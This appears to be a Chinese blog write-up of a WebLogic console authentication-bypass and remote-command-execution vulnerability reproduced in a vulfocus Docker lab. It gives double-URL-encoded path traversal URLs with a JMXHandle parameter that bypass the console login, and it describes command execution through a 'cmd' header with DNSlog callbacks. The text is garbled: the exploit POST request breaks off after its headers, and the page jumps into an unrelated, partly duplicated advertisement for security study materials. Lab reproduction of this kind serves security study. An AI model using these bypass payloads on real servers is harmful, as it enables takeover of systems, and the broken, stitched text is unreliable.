漏洞名称
漏洞描述
Oracle Fusion Middleware的Oracle WebLogic Server产品中的漏洞(组件:控制台),允许未经身份验证的攻击者通过HTTP访问网络,从而导致Oracle WebLogic Server被接管。
影响版本
Oracle WebLogic Server 10.3.6.0.0
Oracle WebLogic Server 12.1.3.0.0
Oracle WebLogic Server 12.2.1.3.0
Oracle WebLogic Server 12.2.1.4.0
Oracle WebLogic Server 14.1.1.0.0
漏洞复现
环境搭建
受害者IP:
192.168.63.129:7001
192.168.63.129:7002
192.168.63.1295556
攻击者IP:
192.168.63.1
vulfocus下载链接
https://github.com/fofapro/vulfocus
git clone https://github.com/fofapro/vulfocus.git
启动vulfocus
docker-compose up -d
环境启动后,访问http://192.168.63.129:7001/console/login/LoginForm.jsp,说明已成功启动。
漏洞利用
需要注意的是,需要我们先登录才行,不登陆就无法进行未授权,weblogic/welcome1。这里我是在虚拟机里面进行登录的,下面的验证是在本机进行验证的。
在虚拟机登录成功。
访问经过二次编码的url,发现有些浏览器可以绕过登录,比如火狐浏览器或者谷歌浏览器。
http://192.168.63.129:7001/console/css/%252e%252e%252fconsole.portal
但是,使用其他浏览器发现绕过失败,使用下面的payload可以绕过。
http://192.168.63.129:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&\_pageLabel=DomainConfigGeneralPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29
通过burp抓包,使用post请求方式进行任意命令执行,在响应体中返回302和localtion跳转信息。在请求头字段cmd加入payload,使用dnslog平台dns带外进行命令执行,
POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: 192.168.63.129:7001
Content-Type: application/x-www-form-urlencoded
Content-Length: 1364
## 最后
**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**
**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**
**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**
![img](https://img-blog.csdnimg.cn/img_convert/6b55251f580cbf8692e3bc5a02b9aeb8.png)
![img](https://img-blog.csdnimg.cn/img_convert/ae33bed95fcb887da9961902d2fd1dbf.png)
![img](https://img-blog.csdnimg.cn/img_convert/8ffa4cb9254699ec05c45f3b6a005e18.png)
![img](https://img-blog.csdnimg.cn/img_convert/511dff315ced8790777b153a57aad1e5.png)
![img](https://img-blog.csdnimg.cn/img_convert/9b69af495838d04754eb4585606d8cdd.png)
**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**
[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)
**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)
**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**